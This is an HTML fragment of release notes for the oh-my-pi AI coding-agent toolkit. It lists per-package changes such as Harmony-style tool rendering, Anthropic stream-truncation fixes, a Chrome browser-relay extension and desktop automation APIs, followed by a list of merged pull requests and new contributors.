<ul>
<li>Tool examples embedded in tool descriptions now always render in Python call syntax, and the <code>exampleDialect</code> option has been removed from <code>AppendOnlyContextManager</code> build options.</li>
<li>Updated <code>normalizeTools</code> to accept a <code>NormalizeToolsOptions</code> configuration object (<code>{ injectIntent, pruneDescriptions }</code>) instead of positional booleans.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where runs would fail with an error if an Anthropic stream was truncated after complete tool calls were streamed; the agent now recovers and executes those tool calls.</li>
<li>Fixed an issue where artifact recovery reads could be incorrectly elided during compaction.</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Changed</h3>
<ul>
<li>Standardized tool-call examples in <code>renderToolExamples</code> and <code>renderToolInventory</code> to use Python keyword-argument syntax (<code>name(key="value")</code>) across all models, removing the model-specific dialect parameter and the <code>DialectRenderOptions.example</code> flag.</li>
<li>Updated <code>renderToolInventory</code> to render the tool catalog as a unified OpenAI-Harmony-style <code>## functions</code> block using TypeScript type declarations and comments, replacing the previous per-tool Markdown sections.</li>
<li>Added a <code>style: "harmony"</code> option to <code>jsonSchemaToTypeScript</code> for generating compact, comma-delimited TypeScript definitions.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed a session-blocking issue where unescaped Harmony control tokens in replayed assistant responses and tool inputs caused subsequent requests to be rejected with <code>invalid_prompt</code> errors.</li>
<li>Fixed an issue where Codex Responses dropped native image-generation results from assistant content and replays due to stale <code>generating</code> statuses.</li>
<li>Fixed Anthropic stream truncation handling where unexpected connection closures were incorrectly treated as clean stops, causing the agent loop to halt silently mid-sentence.</li>
<li>Optimized Anthropic prompt caching to prevent unnecessary cache invalidation of the entire system prefix when volatile project footer details (such as current working directory, date, or workspace tree) change.</li>
</ul>
<h2>@oh-my-pi/browser-relay</h2>
<h3>Added</h3>
<ul>
<li>Initial release of the Chrome MV3 extension, enabling the omp browser tool to attach to and drive existing browser tabs via chrome.debugger.</li>
<li>Added automatic, robust tab management that groups active agent-driven tabs into a dedicated per-window "omp" tab group and ensures clean dissolution upon disconnect.</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where newly advertised chat models were dropped during dynamic discovery for the <code>alibaba-token-plan</code> provider.</li>
<li>Fixed a <code>400</code> error when forcing a specific tool with DeepSeek reasoning models on OpenCode Zen/Go gateways by automatically downgrading the tool selection mode to <code>auto</code> while keeping the tool advertised.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Replaced the computer tool's coordinate-batch schema with persistent JavaScript runs, and removed computer.backend and model-specific controller switching.</li>
<li>Changed the edit tool's replace mode from a multi-edit batch schema to a single-edit schema ({ path, old_string, new_string, replace_all? }).</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added a relay browser mode to drive local Chrome tabs via the OMP Browser Relay extension, supporting automatic daemon startup and tab grouping.</li>
<li>Added a scriptable desktop session featuring window-targeted capture and input, native accessibility trees, clipboard access, and streamed screenshots.</li>
<li>Added broker-shared language servers (controlled by the lsp.shared setting) to multiplex LSP servers across multiple instances in a project, reducing cold-start times and resource usage.</li>
<li>Added optional timeoutMs to discovery configuration in provider options to configure custom HTTP probe timeouts for llama.cpp, Ollama, and OpenAI-compatible endpoints.</li>
<li>Added a cross-platform, in-process ps shell builtin with custom columns, sorting, and process metrics.</li>
<li>Added the --service-tier flag to override the OpenAI service tier for a session.</li>
<li>Added a configurable per-request web search timeout via providers.webSearchTimeoutSeconds.</li>
<li>Added turn-aware /tree navigation shortcuts (Alt+Up/Alt+Down, Home/End, PageUp/PageDown) to traverse user and assistant turns.</li>
<li>Added display.hideToolActivity and a Ctrl+Shift+O shortcut to toggle the visibility of model-initiated tool calls and results.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Exposed the script-driven computer schema to all models, including those with provider-native Computer Use support.</li>
<li>Reduced omp --help cold-start latency and memory usage by rendering lightweight command metadata.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed durability of session transcripts to prevent data loss on process crashes.</li>
<li>Fixed a bug on Windows where a timed-out bash command could terminate the main omp process.</li>
<li>Fixed headless runs hanging or leaving background workers alive after completion.</li>
<li>Fixed a crash when opening the Agent Hub after resuming a session.</li>
<li>Fixed /mcp reauth environment variable expansion and token validation.</li>
<li>Fixed fuzzy replace-all edits re-matching replacement text indefinitely, which could freeze the TUI.</li>
<li>Fixed inspect_image ignoring configured thinking effort for vision models.</li>
<li>Fixed compiled binaries dropping certain extensions with complex CommonJS/ESM dependency graphs.</li>
<li>Fixed template argument substitution executing recursive placeholder expansion when positional arguments contain literal $@ or $ARGUMENTS tokens.</li>
<li>Fixed project-scoped session directories using leading-hyphen names and collapsing distinct paths.</li>
<li>Fixed manual /shake leaving the context budget anchored to stale pre-shake token counts.</li>
<li>Fixed Mnemopi scoped recall reporting "No relevant memories found" when individual targets fail internally.</li>
<li>Fixed skill:// resolution ignoring custom directories when a same-named skill exists in a default path.</li>
<li>Fixed image paste failing on Wayland-only Linux sessions.</li>
<li>Fixed prewalk switching to the fast model during read-only investigations.</li>
<li>Fixed self-update misclassifying glibc Linux hosts with an installed musl loader as musl hosts.</li>
<li>Fixed omp setup python to validate the correct interpreter used by the Python eval runtime.</li>
<li>Fixed the terminal-tab title dropping to idle while an unsuppressed async job was still running.</li>
<li>Fixed redirected stdin being ignored when Bun reports a pipe with an undefined isTTY.</li>
<li>Fixed a literal API key configured via /login being hijacked on Windows by case-differing system environment variables.</li>
<li>Fixed Esc during a streaming /loop iteration pausing the loop instead of aborting the current turn.</li>
<li>Fixed heavily branched conversation trees shifting linear continuations into disconnected columns.</li>
<li>Fixed plugin installation validation failures for legacy compatibility shims.</li>
<li>Removed hard-coded references to disabled or absent agents in system and tool prompts.</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Replaced DesktopSession.execute(actions, window) and action batches with dedicated per-operation methods for capture, pointer, keyboard, window, and accessibility. Capture capabilities now apply per call, and coordinate input requires a prior frame for the same target.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added a cross-platform, in-process ps shell builtin supporting BSD/procps selection forms, custom output columns, sorting, process metrics, and header suppression.</li>
<li>Added unified desktop backends for macOS, Win32, X11, and Wayland behind a single session API, featuring capture-free window discovery, isolated capture, explicit background/foreground delivery, native accessibility trees (AX/UIA/AT-SPI) with generational references, and structured errors for unsupported background input.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed accessibility snapshots incorrectly marking a window root as focused based on its app-local AXFocused attribute when another application held global focus; the root annotation now correctly reflects the global window-roster focus flag.</li>
<li>Improved coordinate-frame error messages for pointer input before capture, out-of-frame coordinates, and between-display points to clearly explain the capture-frame contract and remedy instead of throwing a generic bounds check.</li>
<li>Fixed duplicated characters in AppKit targets on macOS caused by background keyboard events being posted through both CoreGraphics and SkyLight; events are now delivered once via the authenticated SkyLight route.</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed Kitty and Ghostty keyboard shortcuts on non-Latin keyboard layouts by requesting base-layout key reporting from the terminal.</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added utility functions <code>parseFlag()</code>, <code>getBrowserRelayDir()</code>, and <code>getGlobalDaemonRuntimeDir()</code> to support browser relay mode and global daemon runtime directory resolution.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Updated the lightweight CLI runner to support static command metadata, allowing root help to render without importing full command implementations.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>perf(cli): keep root help off runtime graph by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eggpeat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eggpeat">@eggpeat</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5033529980" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7205" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7205/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7205">#7205</a></li>
<li>fix(coding-agent): let customDirectories skills win over default-path duplicates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhang17-24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhang17-24">@zhang17-24</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5036087935" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7246" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7246/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7246">#7246</a></li>
<li>fix(omp): refresh context budget after shake by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oleksoleksoleks/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oleksoleksoleks">@oleksoleksoleks</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5038578336" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7310" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7310/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7310">#7310</a></li>
<li>fix(agent): skip prewalk switch on read-only xd:// device calls by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5038716163" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7314" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7314/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7314">#7314</a></li>
<li>fix(catalog): downgrade forced tool choice for deepseek reasoning models by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5038809588" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7317" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7317/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7317">#7317</a></li>
<li>fix(coding-agent): support Wayland image paste by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5038811015" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7318" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7318/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7318">#7318</a></li>
<li>fix(tui): requested base-layout keys for shortcuts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5038921715" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7321" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7321/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7321">#7321</a></li>
<li>fix(ai): cache stable system prefix across cwd/date footer changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5039412534" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7326" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7326/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7326">#7326</a></li>
<li>fix(compaction): stop shake from re-eliding artifact recovery reads by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jwmacd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jwmacd">@jwmacd</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5039542401" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7327" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7327/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7327">#7327</a></li>
<li>fix(tui): preserve loop after cancelling iteration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5039642305" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7331" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7331/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7331">#7331</a></li>
<li>fix(tui): compact linear branch continuations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5039729707" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7333" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7333/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7333">#7333</a></li>
<li>test(vibe): fix kill-before-init race with a worker-ready handshake by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/szavadsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/szavadsky">@szavadsky</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5040060152" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7340" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7340/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7340">#7340</a></li>
<li>fix(agent): stop leaking scout into prompts when it is disabled by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/szavadsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/szavadsky">@szavadsky</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5040523227" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7344" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7344/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7344">#7344</a></li>
<li>fix(eval): preserve console for ConPTY Python kernels by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5040804854" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7350" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7350/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7350">#7350</a></li>
<li>fix(mnemopi): bound locked retention during teardown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5040884075" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7355" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7355/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7355">#7355</a></li>
<li>fix(mnemopi): bound embed worker IPC and reap on timeout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5040899555" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7356" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7356/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7356">#7356</a></li>
<li>fix(auth): guard config-value resolvers against case-insensitive env hijack by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5041187823" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7362" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7362/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7362">#7362</a></li>
<li>fix(mnemopi): surface scoped recall failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5041675465" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7367" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7367/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7367">#7367</a></li>
<li>docs: document role-backed task agents by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fatihaziz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fatihaziz">@fatihaziz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5041900066" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7371" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7371/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7371">#7371</a></li>
<li>fix(cli): restore piped custom session persistence by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5042184275" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7382" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7382/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7382">#7382</a></li>
<li>test(browser): stop gating chromium tests on a top-level-await export by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paralin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paralin">@paralin</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5042245321" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7384" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7384/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7384">#7384</a></li>
<li>fix(coding-agent): keep focused status bar caps bright by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/art-wiedzmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/art-wiedzmin">@art-wiedzmin</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5042264110" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7385" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7385/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7385">#7385</a></li>
<li>fix(tui): keep working title across non-terminal agent_end by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5042351845" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7387" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7387/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7387">#7387</a></li>
<li>fix(setup): align Python setup probe with eval by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paolofraz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paolofraz">@paolofraz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5042500693" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7390" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7390/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7390">#7390</a></li>
<li>fix(catalog): admit discovered Token Plan chat models by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5043337252" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7392" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7392/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7392">#7392</a></li>
<li>fix(update): detect active Linux libc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BrianHotopp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BrianHotopp">@BrianHotopp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5043632395" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7394" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7394/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7394">#7394</a></li>
<li>fix(postmortem): resolve native hard-exit per call by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5043678167" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7395" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7395/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7395">#7395</a></li>
<li>fix(session): make project directories safe and unique by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5043797892" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7397" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7397/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7397">#7397</a></li>
<li>feat(omp): navigate conversation turns in tree by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oleksoleksoleks/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oleksoleksoleks">@oleksoleksoleks</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5024466863" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7126" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7126/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7126">#7126</a></li>
<li>feat(coding-agent): configure web search timeout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/will-bogusz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/will-bogusz">@will-bogusz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5033196673" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7197" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7197/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7197">#7197</a></li>
<li>fix(edit): prevent fuzzy replace-all self-matching by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5045096573" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7437" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7437/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7437">#7437</a></li>
<li>fix(mcp): expand env vars in reauth OAuth credentials and reject empty tokens by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5045227527" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7441" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7441/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7441">#7441</a></li>
<li>fix(coding-agent): keep completed session entries durable across crashes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/olegpulatov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/olegpulatov">@olegpulatov</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5045673688" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7444" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7444/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7444">#7444</a></li>
<li>fix(openai): preserve Codex native image results by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5045798471" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7447" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7447/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7447">#7447</a></li>
<li>feat(tui): add hidden tool activity mode by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dannyboy-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dannyboy-ai">@dannyboy-ai</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5040310027" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7342" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7342/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7342">#7342</a></li>
<li>fix(extensions): resolve compiled dependency graphs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5044682630" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7405" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7405/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7405">#7405</a></li>
<li>fix(coding-agent): restore legacy compaction exports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5044683022" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7406" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7406/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7406">#7406</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhang17-24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhang17-24">@zhang17-24</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5036087935" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7246" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7246/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7246">#7246</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jwmacd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jwmacd">@jwmacd</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5039542401" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7327" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7327/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7327">#7327</a></li>
